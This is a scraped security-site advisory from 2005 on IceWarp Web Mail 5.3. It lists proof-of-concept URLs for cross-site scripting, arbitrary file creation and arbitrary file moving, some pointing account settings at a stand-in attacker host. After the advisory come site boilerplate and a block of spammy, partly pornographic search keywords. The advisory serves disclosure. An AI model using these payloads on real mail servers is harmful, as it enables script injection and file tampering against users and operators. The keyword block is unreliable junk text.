exploits , vulnerabilities , articles , IceWarp Web Mail Multiple Remote Vulnerabilities

Title	IceWarp Web Mail Multiple Remote Vulnerabilities
Published	2005-01-28-12:00AM
Updated	2005-02-03-05:03PM
Class	Access Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	ShineShadow <ss_contacts@hotmail.com> is credited with the disclosure of these issues.
Vulnerable	IceWarp Web Mail 5.3
Not Vulnerable	IceWarp Web Mail 5.4 IceWarp Web Mail 5.3.2 IceWarp Web Mail 5.3.1
Code	No exploits are required to leverage these issues. The following proof of concepts have been provided: To carry out cross-site scripting attacks: http://www.example.com:32000/mail/login.html?username=[xss_here] http://www.example.com/mail/accountsettings_add.html?id=[]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[xss_here] To create a file with arbitrary contents on an affected computer: http://www.example.com:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accontid=[arbitary_text] To move an arbitrary file to an attacker's folder: http://localhost:32000/importaction.html?id=[sessionid]&importfile=[arbitrary_path]&action=upload&Import=1&importfile_size=1000000
TXT

Vulnerabilities - newest 10 RSS | More

2009-11-26 ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
2009-11-26 America Online ICQ ActiveX Control Remote Code Execution Vulnerability
2009-11-26 Novell eDirectory iMonitor HTTPSTK Buffer Overflow Vulnerability
2009-11-25 Mozilla Firefox and SeaMonkey Download Filename Spoofing Vulnerability
2009-11-25 XM Easy Personal FTP Server File/Folder Remote Denial of Service Vulnerability
2009-11-25 Subscribe to Comments Prior to 2.1 Multiple Unspecified Cross Site Scripting Vulnerabilities
2009-11-25 Mozilla Firefox CVE-2009-3383 Multiple Remote Memory Corruption Vulnerabilities
2009-11-24 Subscribe to Comments WordPress Plugin Multiple Unspecified Input Validation Vulnerabilities
2009-11-24 RETIRED: Microsoft November 2009 Advance Notification Multiple Vulnerabilities
2009-11-24 Cacti Multiple HTML Injection Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sun, 29 Nov 2009 19:13:09 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
3movs news for c sexmct.tv phpMyAgen race 200+%252Fa phpBB hack invision b sex bed ph Microsoft sexyvdieo mambo+Remo ass girls mambo Remo phpbb apac asain girl www.tamilf News Searc ass girls Www.seaxy. hentai callertune MamboBoard I run dis Sex vedeo. sexi walpa www.scoreh p...m/tmp/ backtrack icewarp we vip4.any20 imajenes p sterlingba pc 631 www.Nakeda ww.sexocea PORNO FILM Indonesia WWW.SEXI I www.91xzz. Amateurpor photo sex imap 4 Www.xvideo www.sexysa mambo Remo mulheres n showcart.a ww.sexocea vulnerabil